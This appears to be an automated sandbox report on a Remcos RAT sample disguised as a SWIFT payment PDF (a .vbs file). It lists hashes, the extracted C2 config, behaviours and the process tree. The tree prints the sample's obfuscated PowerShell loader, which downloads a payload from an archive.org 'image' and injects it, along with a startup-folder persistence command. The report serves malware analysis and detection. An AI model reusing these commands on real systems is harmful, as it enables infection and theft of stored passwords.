remcos | 62cd3c0fbbb28a44e83d0b403dea992fa9e0e25243ddeab961282de490f2b928

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-10-2024 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SWIFT 103 202410071519130850 071024.pdf.vbs
Size

193KB
MD5

377669c2284f0c7020ff08d85250bd17
SHA1

a32a1e200df0818b9a3b8c156354406c0e3f8909
SHA256

62cd3c0fbbb28a44e83d0b403dea992fa9e0e25243ddeab961282de490f2b928
SHA512

c0fddbc341c92079427d8d55a0b3b9a2ac4c8a3b4790cf04dfad47d3715f510dd975b14cccd365077ed6e21628bd0911d98fa52ab2b58547e6c3f4f9012313f0
SSDEEP

3072:QSwp19rv+/CtALCVUwxgt5p7GwXvpiE6TLXnUXmaHNTjE:Qz79rmKeeuwFXnhQNT4

Score

10^/10

remcos octobers collection discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

OCTOBERS

ab9001.ddns.net:23782

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
VLC.exe
copy_folder
VLC
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Chrorne-28R56P
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Rmc
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/628-125-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3636-121-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/4300-122-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4300-122-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3636-121-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	2616	powershell.exe
17	2616	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4436	powershell.exe
2616	powershell.exe
2424	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nudicaule.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nudicaule.vbs	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 2616 set thread context of 2808	2616	powershell.exe	93
PID 2808 set thread context of 3456	2808	AddInProcess32.exe	94
PID 2808 set thread context of 3636	2808	AddInProcess32.exe	114
PID 2808 set thread context of 4300	2808	AddInProcess32.exe	115
PID 2808 set thread context of 628	2808	AddInProcess32.exe	118
PID 2808 set thread context of 3620	2808	AddInProcess32.exe	123
PID 2808 set thread context of 3672	2808	AddInProcess32.exe	133
PID 2808 set thread context of 5864	2808	AddInProcess32.exe	143
PID 2808 set thread context of 212	2808	AddInProcess32.exe	155
PID 2808 set thread context of 3872	2808	AddInProcess32.exe	165
PID 2808 set thread context of 5944	2808	AddInProcess32.exe	175
PID 2808 set thread context of 5404	2808	AddInProcess32.exe	186

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1544	cmd.exe
2232	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2232	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4436	powershell.exe
4436	powershell.exe
2424	powershell.exe
2424	powershell.exe
2616	powershell.exe
2616	powershell.exe
3632	msedge.exe
3632	msedge.exe
1580	msedge.exe
1580	msedge.exe
4388	identity_helper.exe
4388	identity_helper.exe
628	AddInProcess32.exe
628	AddInProcess32.exe
3636	AddInProcess32.exe
3636	AddInProcess32.exe
3636	AddInProcess32.exe
3636	AddInProcess32.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe

Suspicious behavior: MapViewOfSection 11 IoCs

pid	Process
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe
2808	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs

pid	Process
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	628	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe
1580	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2808	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5004 wrote to memory of 1544	5004	WScript.exe	82
PID 5004 wrote to memory of 1544	5004	WScript.exe	82
PID 1544 wrote to memory of 2232	1544	cmd.exe	85
PID 1544 wrote to memory of 2232	1544	cmd.exe	85
PID 1544 wrote to memory of 4436	1544	cmd.exe	89
PID 1544 wrote to memory of 4436	1544	cmd.exe	89
PID 5004 wrote to memory of 2424	5004	WScript.exe	90
PID 5004 wrote to memory of 2424	5004	WScript.exe	90
PID 2424 wrote to memory of 2616	2424	powershell.exe	92
PID 2424 wrote to memory of 2616	2424	powershell.exe	92
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2616 wrote to memory of 2808	2616	powershell.exe	93
PID 2808 wrote to memory of 3456	2808	AddInProcess32.exe	94
PID 2808 wrote to memory of 3456	2808	AddInProcess32.exe	94
PID 2808 wrote to memory of 3456	2808	AddInProcess32.exe	94
PID 2808 wrote to memory of 3456	2808	AddInProcess32.exe	94
PID 3456 wrote to memory of 1580	3456	svchost.exe	96
PID 3456 wrote to memory of 1580	3456	svchost.exe	96
PID 1580 wrote to memory of 4444	1580	msedge.exe	97
PID 1580 wrote to memory of 4444	1580	msedge.exe	97
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98
PID 1580 wrote to memory of 3336	1580	msedge.exe	98

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.eluacidun.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.eluacidun.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSB7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIHsnKycwfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0ICcrJ1N5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGknKydlbnQuRG93bmxvYWREYXRhKHsxfWltYScrJ2dlVXJsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGUnKydtLlRleHQuRW5jb2RpbmddOjpVJysnVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5JysndGVzKTt7MScrJ31zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVD4+ezB9O3sxfWVuZEZsYWcgPScrJyB7MH08PEJBU0U2NCcrJ19FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hJysnZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC5JbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezEnKyd9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4JysnICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZScrJ25kSW5kZXggLScrJyB7MX1zdGFydEluZGV4O3sxfWJhc2U2NCcrJ0NvbScrJ21hbmQgPSB7MX1pJysnbWFnZScrJ1RleHQuU3Vic3RyaW5nJysnKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZScrJ3J0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sbycrJ2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoeycrJzF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfTAnKycvWnV0Z1AnKycvZC8nKydlZS5ldHNhcC8vOnNwdHRoezB9JysnLCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdCcrJ2l2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1BZGRJblByb2Nlc3MzMnswfSwgezB9ZGVzYXRpdmFkb3swfSwnKycgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiAgW0NoQXJdMzksW0NoQXJdMzYpfC4gKCAkUFNob21FWzRdKyRwU0hPTWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = {0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg {'+'0};{1}webClient = New-Object '+'System.Net.WebClient;{1}imageBytes = {1}webCli'+'ent.DownloadData({1}ima'+'geUrl);{1}imageText = [Syste'+'m.Text.Encoding]::U'+'TF8.GetString({1}imageBy'+'tes);{1'+'}startFlag = {0}<<BASE64_START>>{0};{1}endFlag ='+' {0}<<BASE64'+'_END>>{0};{1}startIndex = {1}ima'+'geText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1'+'}startIndex;{1}startIndex'+' += {1}startFlag.Length;{1}base64Length = {1}e'+'ndIndex -'+' {1}startIndex;{1}base64'+'Com'+'mand = {1}i'+'mage'+'Text.Substring'+'({1}startIndex, {1}base64Length);{1}commandBytes = [System.Conve'+'rt]::FromBase64String({1}base64Command);{1}lo'+'adedAssembly = [System.Reflection.Assembly]::Load({'+'1}commandBytes);{1}vaiMethod'+' = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}0'+'/ZutgP'+'/d/'+'ee.etsap//:sptth{0}'+', {0}desativado{0}, {0}desat'+'ivado{0}, {0}desativado{0}, {0}AddInProcess32{0}, {0}desativado{0},'+' {0}desativado{0}));') -F [ChAr]39,[ChAr]36)|. ( $PShomE[4]+$pSHOMe[30]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2808
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3456
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:4444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
        7⤵
        
        PID:3336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
        7⤵
        
        PID:4960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
        7⤵
        
        PID:4920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
        7⤵
        
        PID:3692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
        7⤵
        
        PID:2400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 /prefetch:8
        7⤵
        
        PID:1828
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
        7⤵
        
        PID:3576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
        7⤵
        
        PID:1656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
        7⤵
        
        PID:3356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        7⤵
        
        PID:2616
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
        7⤵
        
        PID:2996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
        7⤵
        
        PID:5004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
